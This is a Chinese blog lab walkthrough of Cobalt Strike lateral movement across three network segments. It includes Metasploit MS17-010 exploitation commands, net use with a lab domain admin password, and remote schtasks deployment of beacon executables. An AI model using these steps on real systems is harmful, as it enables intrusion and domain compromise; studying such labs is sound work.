• CS_上线三层跨网段机器(完整过程还原)


    以前讲过用cs_smb_beacon上线不出网机器,但是真实的网络拓扑肯定不止这么一层的网络

    所以我就来搭建一个复杂一点的网络环境!!

    当然了,这三台电脑之间都是不同的网段,(但是同属于一个域环境!!)

    来看网络拓扑!!

    1.先拿下web机器

    这里拿下的方式有很多种,那么我就先讲最简单的一种,没错又是永恒之蓝,但是现实生活中肯定是不会将一台存在永恒之蓝的win7作为web机器的!!

    kali:

    msfconsole
    
    search ms17-010
    use 0
    
    1. set rhost 192.168.43.131
    2. exploit

    成功拿下shell 

    于是先上线到cs!! 监听器,木马这些我就不多说原理了

     记得选上这个没有(stagless)的木马

    然后上传,点击上线,可谓是一气呵成!!!    

    这样,我们就上线了第一台web机器!!!

    2.拿下二层不出网DC

    这里我选择生成的监听器还是smb的beacon 

    然后木马那里就要选择带有stageless的那个木马了,然后先上传到web机器!!!

    然后就是我们熟悉的颁布计划任务了!!!

    1. net use \\192.168.2.129\ipc$ "hongrisec@2024" /user:god\administrator
    2. shell net use
    3. shell copy beacon.exe \\192.168.2.129\c$
    4. shell schtasks /create /s 192.168.2.129 /tn beacon /sc onstart /tr c:\beacon.exe /ru system /f
    5. shell schtasks /run /s 192.168.2.129 /i /tn "beacon"
    6. link 192.168.2.129

    这样就能上线了第二层不出网的域控!!!

    3.上线第三层不出网Win10

    这里的操作和前面的操作不一样,前面的连接都是用的正向连接,现在我们来玩一下反向连接

    先在cs执行以下操作,选择转发上线!!!

    然后你生成一个监听器就是记住你的端口别冲突了!!

    然后就是生成以这个为监听器的木马,并且颁布计划任务了

    1. net use \\192.168.1.130\ipc$ "hongrisec@2024" /user:god\administrator
    2. shell net use
    3. shell copy last.exe \\192.168.1.130\c$
    4. shell schtasks /create /s 192.168.1.130 /tn last /sc onstart /tr c:\last.exe /ru system /f
    5. shell schtasks /run /s 192.168.1.130 /i /tn "last"
    6. link 192.168.1.130

    最后是能看见是能够以last.exe去上线这个木马的!!! 

    可以看见是能够执行命令的

     

  • 相关阅读:
    线程池——futuretask、CompletionService、CompletableFuture
    springboot毕设项目成长档案管理平台jf6j5(java+VUE+Mybatis+Maven+Mysql)
    服务器中毒了——菜是原罪
    杭州跨境电商政策支持
    layui--记录
    OpenSceneGraph3.5.1编译
    应用播放器构建相关回调
    6款流程图制作软件:一站式指南
    在 LLM 架构中应用多专家模型
    CentOS 7 防火墙
  • 原文地址:https://blog.csdn.net/huohaowen/article/details/136302490